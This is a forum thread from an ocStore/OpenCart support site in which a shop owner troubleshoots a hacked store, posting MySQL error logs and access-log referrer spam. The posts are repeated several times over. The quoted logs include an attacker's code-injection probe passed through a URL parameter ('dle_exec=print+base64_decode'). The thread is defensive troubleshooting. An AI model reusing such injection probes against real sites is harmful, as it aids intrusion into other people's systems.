on line 492015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49 закидывал в гугл запрос типа \ Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ' ничего не выдает до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе только в ней было конкретно указано на характерную для хака кодировку 2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQLsyntax; check the manual that corresponds to your MySQL server versionfor the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'' at line 1Error No:1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in теперь совсем в растерянности Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 11 липня 2015 Share Опубліковано: 11 липня 2015 кто подскажет (взято из access.log) что это означает редирект или идет ссылка на данные ресурсы?Заранее спасибо! /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net//detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/""GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/""GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/" Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 13 липня 2015 Share Опубліковано: 13 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 2 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
afwollis Опубліковано: 4 липня 2015 Share Опубліковано: 4 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Микроразметка + ОСТРОВА в YANDEX2.1 автор заверил что все нормально Здравствуйте. Да, могут ругаться. Они часто ругаются на обфурсцированные(закодированные) скрипты. Так что это нормально. Ради собственного спокойствия можете скачать на форуме модуль и заменить необходимые файлы. Вирусов там точно никаких нет. Могу также ключ продублировать. а вирусдай ругается Обнаружены заражения следующих типов: h.ExternalRedirect. завтра планировал оплатить год обслуживания у них Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 автор заверил что все нормально ясн. так и есть. ...а вирусдай ругается... что-что?.. мысли собери - по ссылке речь о .htaccess Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 6 липня 2015 Share Опубліковано: 6 липня 2015 ясн. так и есть. что-что?.. мысли собери - по ссылке речь о .htaccess перепроверил все имеющиеся .htaccess никаких редиректов нет Надіслати Поділитися на інших сайтах More sharing options... laim731 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32 Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Если не поможет - обращайтесь. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 ...терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download...не "не находит", а "не может создать". ocStore проверяет права на директории. если цифровых товаров не предвидится - можно вообще убить эту директорию и выкусить из ocStore её проверку на корректные права. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 9 липня 2015 Share Опубліковано: 9 липня 2015 Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая 2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49 закидывал в гугл запрос типа \ Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ' ничего не выдает до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе только в ней было конкретно указано на характерную для хака кодировку 2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQLsyntax; check the manual that corresponds to your MySQL server versionfor the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'' at line 1Error No:1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in теперь совсем в растерянности Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 11 липня 2015 Share Опубліковано: 11 липня 2015 кто подскажет (взято из access.log) что это означает редирект или идет ссылка на данные ресурсы?Заранее спасибо! /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net//detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/""GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/""GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/" Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 13 липня 2015 Share Опубліковано: 13 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 2 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
Stels32 Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 что за "Microdata"? по "download" halfhope выше написал. Микроразметка + ОСТРОВА в YANDEX2.1 автор заверил что все нормально Здравствуйте. Да, могут ругаться. Они часто ругаются на обфурсцированные(закодированные) скрипты. Так что это нормально. Ради собственного спокойствия можете скачать на форуме модуль и заменить необходимые файлы. Вирусов там точно никаких нет. Могу также ключ продублировать. а вирусдай ругается Обнаружены заражения следующих типов: h.ExternalRedirect. завтра планировал оплатить год обслуживания у них Надіслати Поділитися на інших сайтах More sharing options...
afwollis Опубліковано: 5 липня 2015 Share Опубліковано: 5 липня 2015 автор заверил что все нормально ясн. так и есть. ...а вирусдай ругается... что-что?.. мысли собери - по ссылке речь о .htaccess Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 6 липня 2015 Share Опубліковано: 6 липня 2015 ясн. так и есть. что-что?.. мысли собери - по ссылке речь о .htaccess перепроверил все имеющиеся .htaccess никаких редиректов нет Надіслати Поділитися на інших сайтах More sharing options... laim731 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32 Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Если не поможет - обращайтесь. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 ...терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download...не "не находит", а "не может создать". ocStore проверяет права на директории. если цифровых товаров не предвидится - можно вообще убить эту директорию и выкусить из ocStore её проверку на корректные права. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 9 липня 2015 Share Опубліковано: 9 липня 2015 Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая 2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49 закидывал в гугл запрос типа \ Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ' ничего не выдает до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе только в ней было конкретно указано на характерную для хака кодировку 2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQLsyntax; check the manual that corresponds to your MySQL server versionfor the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'' at line 1Error No:1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in теперь совсем в растерянности Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 11 липня 2015 Share Опубліковано: 11 липня 2015 кто подскажет (взято из access.log) что это означает редирект или идет ссылка на данные ресурсы?Заранее спасибо! /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net//detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/""GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/""GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/" Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 13 липня 2015 Share Опубліковано: 13 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 14 липня 2015 Share Опубліковано: 14 липня 2015 зависит от формата лога. скорее всего "С данных ресурсов" "метод | запрошенный URL | протокол" | код ответа (статус) | объем переданных данных | "referer (откуда перешли)" А как с данных, у меня нет закупленных ссылок и ничего подобного тем более с порно ресурсов, которые так же иногда проскакивают "зависит от формата лога" а как узнать его формат? Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 2 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення Повний пакет SEO Автор: GeekoDev SameSite Session Fix Opencart 3 Автор: web_bond SP Telegram повідомлення FREE Автор: spectre Відключити порожні категорії Автор: spectre SEO Автор тексту категорії / фільтра / блогу з датою оновлення контенту + мікророзмітка Автор: radaevich
Stels32 Опубліковано: 6 липня 2015 Share Опубліковано: 6 липня 2015 ясн. так и есть. что-что?.. мысли собери - по ссылке речь о .htaccess перепроверил все имеющиеся .htaccess никаких редиректов нет Надіслати Поділитися на інших сайтах More sharing options...
laim731 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Надіслати Поділитися на інших сайтах More sharing options...
Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Stels32 Не проще прогнать скриптом который покажет все недостатки? Будет ясно что и откуда. Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Надіслати Поділитися на інших сайтах More sharing options...
Stels32 Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Прогонял скриптом AI-BOLIT сегодня вечером, ничего не найдено, до этого вычистил папку download где им же были обнаружены зараженные файлы, терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download, встречаются темы с похожим вопросом с пометкой (решено) но решения не описано..., вот и ломаю голову че дальше то делать, в дистрибутиве oc_store папка пустая никаких файлов нет. Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Надіслати Поділитися на інших сайтах More sharing options...
halfhope Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 Проблему с ошибкой решил. Зараженных файлов, по мнению скрипта больше нет, будем посомтреть дальше Если не поможет - обращайтесь. Надіслати Поділитися на інших сайтах More sharing options... afwollis Опубліковано: 8 липня 2015 Share Опубліковано: 8 липня 2015 ...терь система ругается при каждом нажатии на панель управления в админке, потому как не находит файл test из той самой папки download...не "не находит", а "не может создать". ocStore проверяет права на директории. если цифровых товаров не предвидится - можно вообще убить эту директорию и выкусить из ocStore её проверку на корректные права. Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 9 липня 2015 Share Опубліковано: 9 липня 2015 Я вернул права на папку dowload 755 и ошибка админки ушла, по утру появилась другая 2015-07-09 4:51:15 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' OR `oldurl` LIKE ''' LIMIT 1' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ''' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:18 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 492015-07-09 4:51:33 - PHP Notice: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' O' at line 1Error No: 1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''/www.liveinternet.ru/click'' OR `oldurl` LIKE '\'/www.liveinternet.ru/click\'' OR `oldurl` LIKE ''/www.liveinternet.ru/click'' LIMIT 1 in /home/i/infostoj/stels32.ru/public_html/system/database/mysql.php on line 49 закидывал в гугл запрос типа \ Error No: 1064<br />SELECT * FROM `url_redirect` WHERE `oldurl` LIKE ''' OR `oldurl` LIKE '\'' OR `oldurl` LIKE ' ничего не выдает до чистки зараженных файлов была подобная ошибка, которая собственно и подсказала о взломе только в ней было конкретно указано на характерную для хака кодировку 2015-06-17 19:07:23 - PHP Notice: Error: You have an error in your SQLsyntax; check the manual that corresponds to your MySQL server versionfor the right syntax to use near 'c3VrYWJseWF0ZGQ=');' OR `oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'' at line 1Error No:1064SELECT * FROM `url_redirect` WHERE `oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode(\'c3VrYWJseWF0ZGQ=\');' OR`oldurl` LIKE'index.php?dle_exec=print+base64_decode('c3VrYWJseWF0ZGQ=');' LIMIT 1 in теперь совсем в растерянности Надіслати Поділитися на інших сайтах More sharing options... Stels32 Опубліковано: 11 липня 2015 Share Опубліковано: 11 липня 2015 кто подскажет (взято из access.log) что это означает редирект или идет ссылка на данные ресурсы?Заранее спасибо! /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://pochemychka.net//detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://sady-urala.ru/"GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://www.ringporno.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 100394 "http://littleberry.ru/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "https://www.qitt.ru/""GET / HTTP/1.1" 200 16895 "http://burger-imperia.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://petrovka-online.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://tomck.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://amilogic.com/""GET /detskie-3x-kolesnie/ HTTP/1.1" 200 99817 "http://imperiafilm.ru/""GET / HTTP/1.1" 200 98657 "http://doska-vsem.ru/" 